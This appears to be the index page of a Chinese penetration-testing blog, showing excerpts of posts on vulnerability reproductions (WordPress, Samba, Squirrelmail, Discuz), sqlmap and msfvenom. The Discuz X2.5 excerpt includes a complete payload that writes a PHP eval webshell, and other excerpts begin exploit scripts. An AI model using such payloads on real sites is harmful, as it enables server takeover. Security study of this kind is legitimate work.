工具分享 + 更多

web路径探测工具 7kbscan-WebPathBrute 1.5.2 (集成三字典)

web路径探测工具 7kbscan-WebPathBrute 1.5.2 (集成三字典)

2017-08-7  ℃  0
 0 

————————-邪恶的分割线——————————– 使用与更新说明 1.5.2 Beta 2017-08-06 一、接受建议加入cookie功能 二、接受建议修改对URL的处理方法 去掉多余的 ‘/’ 三、对3xx结果 显示跳转后地址 http://www.xxx.xxx/admin/index.php ——–> login_redir.php 1.5.1 Beta 2017-08-05

微信之又弹了xss…思路666

微信之又弹了xss…思路666

首先需要测试请自备2台手机,如果没有跟我一样还原数据,好多群里保存的图片都没了,尴尬。 慎用!!!!前方高能!!! 一、点击设置 -> 账号与安全 -> 登录设备管理(安卓机子就是账号保护) -> 具体图如下: 二、如果直接编辑,设备信息是过滤了的,如下图: 而且长度只能在5-10个字符 三、重要点来了,就是IOS和安卓都有个功能,如下图: 保存手机名称 这里设置好后,退出微信登

Linux中的Stack Clash漏洞,可被黑客利用获取本地root权限

Linux中的Stack Clash漏洞,可被黑客利用获取本地root权限

上个月,Qualys的安全研究人员在多种基于Unix的系统上发现名为“Stack Clash”的漏洞,该漏洞能让攻击者在UNIX系统上获得root权限,并接管这台受到攻击的计算机。目前安全研究人员发现了这个缺陷,正与各种供应商合作,尽早发布修复程序。 LinuxPenguin.png 据 Qualys 的研究人员介绍,这个问题影响了许多 UNIX 系统,如 Linux,OpenBSD,NetBSD

maccms 代码执行0day

maccms 代码执行0day

百度采集getshell # coding=utf-8 import requests import urllib from bs4 import BeautifulSoup headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" } def xxe(

Squirrelmail远程代码执行漏洞(CVE-2017-7692)复现+修复方案

Squirrelmail远程代码执行漏洞(CVE-2017-7692)复现+修复方案

一、实验环境 操作机:kali2.0 目标机:Centos 6.0 Squirrelmail版本:1.4.22-4el6 二、漏洞原理 1、有一个可以登录的邮箱账号和密码 2、Squirrelmai的MAT(因特网邮件传送代理)需要配置Sendmail 3、Squirrelmail的edit_identity配置为true(默认配置) 该漏洞的触发点位于Squirrelmail源码中的Delive

WordPress 4.6远程代码执行漏洞分析

WordPress 4.6远程代码执行漏洞分析

0×00 漏洞概述 WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用该漏洞就能实现远程代码执行,针对目标服务器实现即时访问,最终导致目标应用服务器的完全陷落。无需插件或者非标准设置,就能利用该漏洞。Dawid Golunski (@dawid_golunski) 还在poc中为我们展示了精彩的替换 / 和 “ ”(表示空格)的技巧。 0×01 漏洞分析 整

渗透文章 + 更多

Discuz ssrf漏洞利用的几个python脚本

Discuz ssrf漏洞利用的几个python脚本

扫描本机开放的端口: #!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: Lcy # @Date:   2016-07-05 20:55:30 # @Last Modified by:   Lcy # @Last Modified time: 2016-10-10 16:26:14 import requests import thre

Discuz! X2.5 远程代码执行漏洞及EXP 0day

Discuz! X2.5 远程代码执行漏洞及EXP 0day

1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码 <?php @eval($_POST[

FineCMS SYS_KEY未初始化导致任意文件写入

FineCMS SYS_KEY未初始化导致任意文件写入

起初我以为这个sys_key是随机生成的.然后我本地和vps上发现都是一样的.最后去看了下源码发现没有生成这个值的地方.最后的最后看了开源的地址http://git.oschina.net/dayrui/finecms/blob/master/v5/config/system.php 发现是固定值 24b16fede9a67c9251d3e7c7161c83ac 文件:finecms/dayrui

浅谈Web渗透测试中的信息收集

浅谈Web渗透测试中的信息收集

下面一张图比较详细的介绍了渗透测试中的信息收集,看过许多 freebuf 大牛写的文章,今天也给大家分享一些自己的经验(也就一小白,错误的地方各位牛牛多多指正)。  信息收集对于渗透测试可以说是重中之重,正所谓“知己知彼,百战不殆”。所以我们的信息收集也是一样,收集的信息自然也是越多越好,这里有个文章http://www.doc88.com/p-7784047461299.html,这里的PTES

三个案例看Nginx配置安全

三个案例看Nginx配置安全

之前在Sec-News中推荐了一个开源程序 https://github.com/yandex/gixy ,作用是来检测Nginx配置文件中存在的问题。正好Pwnhub上周的比赛也出现了一道题,包含由Nginx配置错误导致的漏洞。 所以我挑选我觉得比较有趣,而且很有可能犯错误的三个典型案例,来说说Nginx配置文件的安全。 另外,本文所涉及的三个案例,均已上线到Vulhub( https://gi

Sqlmap使用教程【个人笔记精华整理】

Sqlmap使用教程【个人笔记精华整理】

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 sqlmap教程 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲

Samba远程命令执行漏洞(CVE-2017-7494)

Samba远程命令执行漏洞(CVE-2017-7494)

漏洞信息: 2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 漏洞利用条件: 1. 服务器打开了文件/打印机共享端口445,让其能够在公网上访问 2. 共享文件拥有写入权限 3. 恶意攻击者需猜解Samba服务端共享目录的物理路

Msfvenom学习总结

Msfvenom学习总结

MSFVENOM常规选项 1.    –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2.    –l 查看所有payloa


扫一扫二维码分享
00:00/00:00